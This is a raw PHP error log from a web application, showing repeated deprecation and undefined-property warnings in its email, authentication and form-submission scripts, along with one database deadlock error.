[13-Jan-2025 11:27:59 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 11:28:10 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 11:28:27 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 11:32:23 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 22:01:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Jan-2025 22:30:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Jan-2025 22:31:47 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 22:31:59 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 22:32:11 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 22:49:48 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 22:50:13 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 00:14:22 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [14-Jan-2025 00:14:37 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 00:14:50 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 00:14:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [14-Jan-2025 00:49:10 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [14-Jan-2025 00:49:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [14-Jan-2025 00:50:59 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 02:24:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [14-Jan-2025 02:25:29 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 02:25:57 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 03:30:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [14-Jan-2025 03:52:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [14-Jan-2025 05:29:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [14-Jan-2025 05:31:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [14-Jan-2025 05:59:35 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 06:14:22 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [14-Jan-2025 06:32:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [14-Jan-2025 11:25:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [14-Jan-2025 11:25:46 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 11:25:54 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 11:30:29 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 11:30:45 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 11:31:01 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 11:31:10 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 11:34:47 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 11:34:55 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 11:35:28 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 11:35:50 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 11:35:59 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 11:36:13 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 20:40:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [14-Jan-2025 20:41:36 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 20:42:21 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 20:42:33 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 20:43:03 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 20:43:17 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 20:43:43 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 20:43:57 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 20:44:08 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 20:44:22 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 21:33:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [14-Jan-2025 21:47:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [14-Jan-2025 21:48:55 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 21:49:23 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 21:49:51 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 21:50:58 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 22:39:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [14-Jan-2025 23:37:13 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [14-Jan-2025 23:37:45 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [14-Jan-2025 23:40:21 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 23:40:51 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 00:00:05 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 00:42:45 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 00:53:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 01:08:53 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 01:10:03 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 01:10:20 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 01:11:24 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 01:21:11 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 01:21:48 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 01:24:10 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 01:24:22 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 01:24:41 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 01:24:56 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 01:25:52 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 01:27:37 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 01:27:58 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 01:28:14 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 01:29:17 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 01:30:50 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 01:31:40 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 01:31:55 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 01:32:07 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 01:32:18 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 01:32:40 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 01:32:56 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 01:34:14 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 01:51:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 02:15:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 02:39:37 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 03:30:31 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 04:11:11 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 04:32:03 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 04:46:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 04:48:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 05:13:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 05:23:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 05:33:52 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 05:35:30 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 05:35:40 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 05:35:51 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 05:58:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 05:58:22 UTC] PHP Warning: Undefined array key "schoolName" in /home/emeraadmin/public_html/pages/submit_form.php on line 11 [15-Jan-2025 05:58:22 UTC] PHP Warning: Undefined array key "date" in /home/emeraadmin/public_html/pages/submit_form.php on line 12 [15-Jan-2025 05:58:22 UTC] PHP Warning: Undefined array key "time" in /home/emeraadmin/public_html/pages/submit_form.php on line 13 [15-Jan-2025 05:58:22 UTC] PHP Warning: Undefined array key "latitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 20 [15-Jan-2025 05:58:22 UTC] PHP Warning: Undefined array key "longitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 21 [15-Jan-2025 06:01:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 06:43:56 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 06:50:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 07:07:04 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 09:10:56 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 09:11:29 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 09:12:07 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 09:12:28 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 09:13:15 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 09:13:26 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 09:13:37 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 09:15:18 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 09:15:26 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 09:16:58 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 09:17:07 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 10:41:59 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 10:42:16 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 10:42:25 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 10:42:34 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 10:43:07 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 21:01:05 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 21:41:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 21:50:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 22:18:03 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 22:59:01 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 22:59:07 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 23:00:00 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 23:02:10 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 23:13:19 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 23:39:31 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Jan-2025 00:12:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Jan-2025 00:32:15 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Jan-2025 01:00:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Jan-2025 01:10:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Jan-2025 01:55:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Jan-2025 02:05:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Jan-2025 02:49:53 UTC] PHP Fatal error: Uncaught PDOException: SQLSTATE[40001]: Serialization failure: 1213 Deadlock found when trying to get lock; try restarting transaction in /home/emeraadmin/public_html/Classes/Database.php:78 Stack trace: #0 /home/emeraadmin/public_html/Classes/Database.php(78): PDOStatement->execute() #1 /home/emeraadmin/public_html/Service/TaskFormService.php(32): Database->execute() #2 /home/emeraadmin/public_html/pages/submit_form.php(40): TaskFormService->insertTaskForm(Object(TaskForm)) #3 {main} thrown in /home/emeraadmin/public_html/Classes/Database.php on line 78 [16-Jan-2025 02:52:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Jan-2025 03:09:15 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Jan-2025 03:30:38 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Jan-2025 03:37:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Jan-2025 03:40:03 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Jan-2025 03:54:15 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Jan-2025 04:04:09 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Jan-2025 05:35:59 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Jan-2025 05:52:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Jan-2025 06:42:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Jan-2025 07:22:15 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Jan-2025 08:58:12 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Jan-2025 09:23:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Jan-2025 09:23:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Jan-2025 09:24:20 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 09:41:11 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Jan-2025 09:41:32 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 09:42:14 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 09:42:27 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 09:45:31 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 09:45:43 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 09:45:58 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 09:46:17 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 09:46:25 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 09:46:59 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 09:57:06 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 09:57:29 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 09:57:47 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 09:57:56 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 09:58:05 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 09:58:21 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 09:58:50 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 09:58:59 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 